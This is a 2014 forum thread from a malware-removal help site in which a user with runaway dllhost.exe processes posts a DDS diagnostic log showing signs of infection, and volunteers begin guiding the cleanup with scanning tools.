Multiple instances of dllhost.exe taking up all of my CPU


  • This topic is locked
16 replies to this topic

#1 RaRWolf

RaRWolf

  • Members
  • 8 posts

Posted 16 October 2014 - 02:24 PM

A few weeks ago tons of dllhost.exes started opening in my task manager and taking up all of my memory, slowing down my computer exponentially. I've tried using Malwarebytes to detect any viruses but it can't see anything. I deleted my temp folder (which was about 50-60 GB) and within a few hours all of it was back.

 

I have Windows 8 64 bit, tell me what I need to do.




 


#2 HelpBot

HelpBot

    Bleepin' Binary Bot


  • Bots
  • 12,733 posts
  • Gender:Male

Posted 21 October 2014 - 02:25 PM

Hello and welcome to Bleeping Computer!

I am HelpBot: an automated program designed to help the Bleeping Computer Staff better assist you! This message contains very important information, so please read through all of it before doing anything.

We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.

To help Bleeping Computer better assist you please perform the following steps:

***************************************************

In order to continue receiving help at BleepingComputer.com, YOU MUST tell me if you still need help or if your issue has already been resolved on your own or through another resource! To tell me this, please click on the following link and follow the instructions there.

CLICK THIS LINK >>> http://www.bleepingcomputer.com/logreply/552234 <<< CLICK THIS LINK



If you no longer need help, then all you needed to do was the previous instructions of telling me so. You can skip the rest of this post. If you do need help please continue with Step 2 below.

***************************************************

If you still need help, I would like you to post a Reply to this topic (click the "Add Reply" button in the lower right hand of this page). In that reply, please include the following information:

  • If you have not done so already, include a clear description of the problems you're having, along with any steps you may have performed so far.
  • A new DDS log. For your convenience, you will find the instructions for generating these logs repeated at the bottom of this post.
    • Please do this even if you have previously posted logs for us.
    • If you were unable to produce the logs originally please try once more.
    • If you are unable to create a log please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
    • If you are unsure about any of these characteristics just post what you can and we will guide you.
  • Please tell us if you have your original Windows CD/DVD available.
  • Upon completing the above steps and posting a reply, another staff member will review your topic and do their best to resolve your issues.

Thank you for your patience, and again sorry for the delay.

***************************************************

We need to see some information about what is happening in your machine. Please perform the following scan again:

  • Download DDS by sUBs from the following link if you no longer have it available and save it to your desktop.

    DDS.com Download Link
  • Double click on the DDS icon, allow it to run.
  • A small box will open, with an explanation about the tool. No input is needed, the scan is running.
  • Notepad will open with the results.
  • Follow the instructions that pop up for posting the results.
  • Close the program window, and delete the program from your desktop.
Please note: You may have to disable any script protection running if the scan fails to run. After downloading the tool, disconnect from the internet and disable all antivirus protection. Run the scan, enable your A/V and reconnect to the internet.

Information on A/V control can be found HERE.

As I am just a silly little program running on the BleepingComputer.com servers, please do not send me private messages as I do not know how to read and reply to them! Thanks!

#3 RaRWolf

RaRWolf
  • Topic Starter

  • Members
  • 8 posts

Posted 21 October 2014 - 05:56 PM

I do not still have my windows install disk.
 
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 10.0.9200.16537  BrowserJavaVersion: 10.67.2
Run by RaRWolf at 18:36:28 on 2014-10-21
Microsoft Windows 8  6.2.9200.0.1252.1.1033.18.8156.3560 [GMT -4:00]
.
AV: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\dwm.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe
C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe
C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe
C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhostex.exe
C:\Program Files (x86)\ASUS\AI Suite II\AsRoutineController.exe
C:\Program Files (x86)\ASUS\AI Suite II\Dr.Net\AsDrNotify.exe
C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Windows\SysWOW64\PnkBstrA.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\Wacom_Tablet.exe
C:\Program Files\Windows Defender\MsMpEng.exe
C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
C:\Program Files\Tablet\Wacom\Wacom_TouchUser.exe
C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Windows\System32\Taskmgr.exe
C:\Program Files\Microsoft Xbox 360 Accessories\XBoxStat.exe
C:\Program Files\Logitech\SetPointP\SetPoint.exe
C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
C:\Users\RaRWolf\AppData\Local\FluxSoftware\Flux\flux.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
C:\Program Files\Common Files\LogiShrd\KHAL3\KHALMNPR.EXE
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\ASUS\AI Suite II\EPU\EPUHelp.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Program Files\CCleaner\CCleaner64.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\unsecapp.exe
svchost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\nacl64.exe
C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\nacl64.exe
C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe
svchost.exe
C:\Users\RaRWolf\AppData\Roaming\uTorrent\uTorrent.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Program Files\Windows Defender\MpCmdRun.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\system32\msiexec.exe
C:\Windows\system32\taskeng.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
-k netsvcs
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\syswow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Windows\SysWow64\dllhost.exe
C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\syswow64\dllhost.exe
C:\Program Files (x86)\Steam\Steam.exe
C:\Windows\SysWow64\dllhost.exe
C:\Program Files (x86)\Steam\Steam.exe
C:\Program Files (x86)\Steam\steamerrorreporter.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = www.google.com
uDefault_Page_URL = hxxp://asus13.msn.com
uWindows: Load = C:\Users\RaRWolf\LOCALS~1\Temp\mswuuuq.com
mWinlogon: Userinit = userinit.exe,
BHO: Adobe PDF Link Helper: {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
BHO: Bing Bar Helper: {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll
BHO: RealNetworks Download and Record Plugin for Internet Explorer: {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll
BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll
BHO: Skype Click to Call for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
BHO: Logitech SetPoint: {AF949550-9094-4807-95EC-D1C317803333} - C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll
BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll
TB: Bing Bar: {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BingExt.dll
uRun: [Steam] "C:\Program Files (x86)\Steam\steam.exe" -silent
uRun: [AdobeBridge] <no file>
uRunOnce: [*c6d67] C:\0c6d674\0c6d674.exe
uRunOnce: [*c6d674] C:\Users\RaRWolf\AppData\Local\Temp\bc50\AppData\Roaming\0c6d674.exe
mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
mRun: [ASUS Ai Charger] C:\Program Files (x86)\ASUS\ASUS Ai Charger\AiChargerAP.exe
mRun: [ASUS Easy Update] C:\Program Files (x86)\ASUS\ASUS Easy Update\ALU.exe
mRun: [ASUSWebStorage] C:\Program Files (x86)\ASUS\WebStorage Sync Agent\1.1.3.105\AsusWSPanel.exe /S
mRun: [ASUSPRP] "C:\Program Files (x86)\ASUS\APRP\APRP.EXE"
mRun: [RemoteControl10] "C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [amd_dc_opt] C:\Program Files (x86)\AMD\Dual-Core Optimizer\amd_dc_opt.exe
mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
mRun: [TkBellExe] "C:\Program Files (x86)\Real\RealPlayer\update\realsched.exe"  -osboot
mRun: [Razer Synapse] "C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe"
mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
mRun: [LogMeIn Hamachi Ui] "C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2-ui.exe" --auto-start
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\StartUp\REALPL~1.LNK - C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin64\rpsystray.exe
mPolicies-System: PromptOnSecureDesktop = dword:0
mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
Trusted Zone: clonewarsadventures.com
Trusted Zone: freerealms.com
Trusted Zone: soe.com
Trusted Zone: sony.com
TCP: NameServer = 192.168.0.1
TCP: Interfaces\{0C84C238-3067-4BDF-9DA6-6575A72DD1BA} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{3A7C171E-187D-4FC1-9BEA-1AFB3A63E092} : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{C8639A44-615F-4F73-81DB-9ED248398997} : DHCPNameServer = 192.168.0.1
TCP: Interfaces\{C8639A44-615F-4F73-81DB-9ED248398997}\14E64627F696461405 : DHCPNameServer = 192.168.43.1
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
AppInit_DLLs= DllInjectHelper.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Bing Bar Helper: {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} - C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\amd64\BingExt.dll
x64-BHO: RealNetworks Download and Record Plugin for Internet Explorer: {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll
x64-BHO: Skype Click to Call for Internet Explorer: {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-BHO: Logitech SetPoint: {AF949550-9094-4807-95EC-D1C317803333} - C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll
x64-TB: Bing Bar: {eec0f710-38b5-4aba-99bf-ec87564a4e13} - 
x64-Run: [AdobeAAMUpdater-1.0] "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
x64-Run: [NvBackend] "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
x64-Run: [ShadowPlay] C:\Windows\System32\rundll32.exe C:\Windows\System32\nvspcap64.dll,ShadowPlayOnSystemStart
x64-Run: [Logitech Download Assistant] C:\Windows\System32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
x64-Run: [XboxStat] "C:\Program Files\Microsoft Xbox 360 Accessories\XboxStat.exe" silentrun
x64-Run: [EvtMgr6] C:\Program Files\Logitech\SetPointP\SetPoint.exe /launchGaming
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe -s
x64-mPolicies-System: PromptOnSecureDesktop = dword:0
x64-mPolicies-System: ConsentPromptBehaviorAdmin = dword:0
x64-IE: {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: LBTWlgn - c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll
x64-SSODL: WebCheck - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\RaRWolf\AppData\Roaming\Mozilla\Firefox\Profiles\g0sikcyb.default-1384639035960\
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Battlelog Web Plugins\2.4.0\npbattlelog.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
FF - plugin: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
FF - plugin: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll
FF - plugin: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll
FF - plugin: C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll
FF - plugin: C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\ProgramData\id Software\QuakeLive\npquakezero.dll
FF - plugin: C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll
FF - plugin: C:\Users\RaRWolf\AppData\Local\Roblox\Versions\version-58bb25d673384171\NPRobloxProxy.dll
FF - plugin: C:\Users\RaRWolf\AppData\LocalLow\Square Enix\nprun3d.dll
FF - plugin: C:\Users\RaRWolf\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll
FF - plugin: C:\Windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_14_0_0_145.dll
.
============= SERVICES / DRIVERS ===============
.
R0 amd_sata;amd_sata;C:\Windows\System32\Drivers\amd_sata.sys [2012-8-22 79528]
R0 amd_xata;amd_xata;C:\Windows\System32\Drivers\amd_xata.sys [2012-8-22 26280]
R2 asComSvc;ASUS Com Service;C:\Program Files (x86)\ASUS\AXSP\1.00.19\atkexComSvc.exe [2012-9-14 920736]
R2 asHmComSvc;ASUS HM Com Service;C:\Program Files (x86)\ASUS\AAHM\1.00.20\aaHMSvc.exe [2012-9-14 951936]
R2 AsSysCtrlService;ASUS System Control Service;C:\Program Files (x86)\ASUS\AsSysCtrlService\1.00.13\AsSysCtrlService.exe [2012-9-14 149120]
R2 c2cautoupdatesvc;Skype Click to Call Updater;C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2014-7-14 1390176]
R2 c2cpnrsvc;Skype Click to Call PNR Service;C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2014-7-14 1767520]
R2 Hamachi2Svc;LogMeIn Hamachi Tunneling Engine;C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe [2014-9-4 2525008]
R2 HiPatchService;Hi-Rez Studios Authenticate and Update Service;C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe [2013-2-19 9216]
R2 LMIGuardianSvc;LMIGuardianSvc;C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe [2014-8-8 377616]
R2 rzpmgrk;rzpmgrk;C:\Windows\System32\Drivers\rzpmgrk.sys [2014-8-12 37184]
R2 rzpnk;rzpnk;C:\Windows\System32\Drivers\rzpnk.sys [2014-8-12 129856]
R3 BazisVirtualCDBus;WinCDEmu Virtual Bus Driver;C:\Windows\System32\Drivers\BazisVirtualCDBus.sys [2011-6-4 198480]
R3 dtsoftbus01;DAEMON Tools Virtual Bus Driver;C:\Windows\System32\Drivers\dtsoftbus01.sys [2013-5-26 283200]
R3 LcUvcUpper;LcUvcUpper Service;C:\Windows\System32\Drivers\LcUvcUpper.sys [2013-10-14 34408]
R3 LEqdUsb;Logitech SetPoint Unifying KMDF USB Filter;C:\Windows\System32\Drivers\LEqdUsb.sys [2014-3-18 77592]
R3 LHidEqd;Logitech SetPoint Unifying KMDF HID Filter;C:\Windows\System32\Drivers\LHidEqd.sys [2014-3-18 13080]
R3 Linksys_adapter_H;Linksys Adapter Network Driver;C:\Windows\System32\Drivers\AE2500w764.sys [2012-12-26 1254464]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\Drivers\mbam.sys [2014-10-7 25816]
R3 NvStreamKms;NvStreamKms;C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [2014-5-27 20256]
R3 nvvad_WaveExtensible;NVIDIA Virtual Audio Device (Wave Extensible) (WDM);C:\Windows\System32\Drivers\nvvad64v.sys [2014-5-27 40392]
R3 RTL8168;Realtek 8168 NT Driver;C:\Windows\System32\Drivers\Rt630x64.sys [2012-9-14 683664]
R3 RZMAELSTROMVADService;Razer Surround Audio Enhancer Service;C:\Windows\System32\Drivers\RzMaelstromVAD.sys [2014-6-9 32768]
R3 ScreamBAudioSvc;ScreamBee Audio;C:\Windows\System32\Drivers\ScreamingBAudio64.sys [2010-7-1 38992]
S1 fsthvckq;fsthvckq;C:\Windows\System32\Drivers\fsthvckq.sys [2014-10-19 55104]
S2 BBSvc;BingBar Service;C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\BBSvc.EXE [2014-3-11 193696]
S2 MBAMScheduler;MBAMScheduler;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [2014-10-7 1809720]
S2 MBAMService;MBAMService;C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [2014-10-7 860472]
S2 NAUpdate;Nero Update;C:\Program Files (x86)\Nero\Update\NASvc.exe [2012-7-13 769432]
S3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\Windows\System32\Drivers\AtihdW86.sys [2013-4-23 98744]
S3 BBUpdate;BBUpdate;C:\Program Files (x86)\Microsoft\BingBar\7.3.132.0\SeaPort.EXE [2014-3-11 247968]
S3 BEService;BattlEye Service;C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [2013-2-3 49152]
S3 Desura Install Service;Desura Install Service;C:\Program Files (x86)\Common Files\Desura\desura_service.exe [2013-6-11 131912]
S3 hidkmdf;KMDF Driver;C:\Windows\System32\Drivers\hidkmdf.sys [2014-6-27 14136]
S3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\Drivers\mwac.sys [2014-10-7 64216]
S3 RTCore64;RTCore64;C:\Program Files (x86)\MSI Afterburner\RTCore64.sys [2013-1-23 13368]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\Drivers\usbaapl64.sys [2012-12-13 54784]
S3 WacHidRouter;Wacom Hid Router;C:\Windows\System32\Drivers\wachidrouter.sys [2014-6-27 95032]
S3 wacomrouterfilter;Wacom Router Filter Driver;C:\Windows\System32\Drivers\wacomrouterfilter.sys [2014-6-27 15160]
S3 WUDFWpdMtp;WUDFWpdMtp;C:\Windows\System32\Drivers\WUDFRd.sys [2012-7-25 198656]
S3 xusb22;Xbox 360 Wireless Receiver Driver Service 22;C:\Windows\System32\Drivers\xusb22.sys [2012-7-25 89088]
.
=============== File Associations ===============
.
FileExt: .reg: Applications\notepad.exe=C:\Windows\System32\NOTEPAD.EXE %1 [UserChoice]
.
=============== Created Last 30 ================
.
2014-10-21 22:33:12 -------- d--h--w- C:\0c6d674
2014-10-21 09:35:10 75888 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{679CC992-B653-42C6-BDBC-662B695EDEB0}\offreg.dll
2014-10-21 07:00:06 11578928 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{679CC992-B653-42C6-BDBC-662B695EDEB0}\mpengine.dll
2014-10-20 01:20:55 55104 ----a-w- C:\Windows\System32\drivers\fsthvckq.sys
2014-10-19 15:45:51 -------- d-----w- C:\Users\RaRWolf\AppData\Local\PAYDAY
2014-10-18 23:10:42 -------- d-----w- C:\Users\RaRWolf\AppData\Roaming\Ifylqyte
2014-10-17 21:27:45 -------- d-sh--w- C:\found.000
2014-10-17 02:57:29 269992 ----a-w- C:\ProgramData\Microsoft\Windows\Sqm\Manifest\Sqm10248.bin
2014-10-16 03:25:11 10521840 ----a-w- C:\ProgramData\Microsoft\Windows Defender\Definition Updates\Backup\mpengine.dll
2014-10-13 22:14:06 -------- d-----w- C:\Windows\LastGood.Tmp
2014-10-13 02:16:56 -------- d-----w- C:\Program Files\CCleaner
2014-10-12 09:55:43 -------- d-----w- C:\reg value hkus
2014-10-12 04:25:12 -------- d-----w- C:\Users\RaRWolf\AppData\Local\Plarium
2014-10-10 18:05:16 -------- d-----w- C:\Users\RaRWolf\Zomboid
2014-10-10 16:55:53 0 ----a-w- C:\Users\RaRWolf\AppData\Roaming\nzhmwb.dll
2014-10-10 16:55:38 81408 ----a-w- C:\Users\RaRWolf\AppData\Roaming\qxigf.dll
2014-10-10 16:55:07 47104 ----a-w- C:\Users\RaRWolf\AppData\Roaming\dbrmh.dll
2014-10-10 12:07:54 -------- d-----w- C:\ProgramData\E1802384DB2718039F19F24F4594560F
2014-10-10 11:57:17 -------- d-----w- C:\Users\RaRWolf\AppData\Local\gamemaker_studio
2014-10-10 11:57:15 -------- d-----w- C:\ProgramData\gamemaker_studio
2014-10-09 01:59:05 -------- d-----w- C:\Users\RaRWolf\AppData\Roaming\AIMP3
2014-10-08 22:45:46 -------- d-----w- C:\Users\RaRWolf\AppData\Roaming\Stykz Help
2014-10-07 22:53:09 122584 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2014-10-07 22:52:05 91352 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys
2014-10-07 22:52:05 64216 ----a-w- C:\Windows\System32\drivers\mwac.sys
2014-10-07 22:52:04 25816 ----a-w- C:\Windows\System32\drivers\mbam.sys
2014-10-07 22:52:03 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-07 02:16:16 -------- d-----w- C:\Users\RaRWolf\AppData\Local\._LiveCode_
2014-10-07 02:15:46 -------- d-----w- C:\Users\RaRWolf\AppData\Roaming\Stykz
2014-10-05 18:34:22 -------- d-----w- C:\FRST
2014-09-25 02:41:23 -------- d-----w- C:\Users\RaRWolf\AppData\Roaming\Construct2
.
==================== Find3M  ====================
.
2014-09-27 18:20:01 348928 ----a-w- C:\Windows\SysWow64\PnkBstrB.xtr
2014-09-27 18:20:01 348928 ----a-w- C:\Windows\SysWow64\PnkBstrB.exe
2014-09-27 18:15:12 280904 ----a-w- C:\Windows\SysWow64\PnkBstrB.ex0
2014-09-22 06:42:39 278152 ------w- C:\Windows\System32\MpSigStub.exe
2014-09-04 15:44:24 46136 ---ha-w- C:\Windows\System32\drivers\Hamdrv.sys
2014-08-17 23:48:48 18960 ----a-w- C:\Windows\System32\drivers\LNonPnP.sys
2014-08-02 00:15:52 505416 ----a-w- C:\Windows\SysWow64\msvcp71.dll
2014-08-02 00:15:52 353864 ----a-w- C:\Windows\SysWow64\msvcr71.dll
2014-07-25 16:55:09 98216 ----a-w- C:\Windows\SysWow64\WindowsAccessBridge-32.dll
2014-07-25 14:01:55 1291280 ----a-w- C:\Windows\SysWow64\nvspbridge.dll
2014-07-25 14:01:55 1126480 ----a-w- C:\Windows\SysWow64\nvspcap.dll
2014-07-25 14:01:32 1715224 ----a-w- C:\Windows\System32\nvspbridge64.dll
2014-07-25 14:01:32 1283136 ----a-w- C:\Windows\System32\nvspcap64.dll
2013-08-13 22:03:22 88 ----a-w- C:\Program Files (x86)\update-payday2.bat
.
============= FINISH: 18:39:41.93 ===============
 


#4 Naathim

Naathim

    Bleepin' Minion


  • Members
  • 435 posts
  • Gender:Male
  • Location:Poland

Posted 22 October 2014 - 02:59 AM




My name's Naathim and I'm a GeekU Minion! Now that we are mates and will be working together to clean your machine out of any junkware, feel free to call me Naat :)

Before we start please note the following:

  • Analysis and research take some time, also sometimes real life gets in the way, please be patient.
  • Limit your internet access to posting here, some infections just wait to steal typed-in passwords.
  • Don't run any scripts or tools on your own, unsupervised usage may cause more harm than good.
  • Paste the logs in your posts, attachments make my work harder and more complicated.
  • Stay with me to the end, the absence of symptoms doesn't mean that your machine is fully operational.
  • Note that we may live in totally different time zones, which may cause some delays between answers.

I can't foresee everything, so if anything unexpected happens, please stop and inform me!
There are no silly questions. Never be afraid to ask if in doubt!

Let's start and enjoy the fight! :)


Scan with Farbar Recovery Scan Tool

Please download Farbar Recovery Scan Tool and save it to your Desktop.
There will be two versions to download: 32-bit and 64-bit. Please download the one that is designed for your system. If you don't know which one it should be, download both of them and try each one out. Only one will run - this is the right one. Please leave it and delete the other.

  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    > XP users click run after receipt of Windows Security Warning - Open File.
    > 8 users will be prompted about Windows SmartScreen protection - click More information and Run.
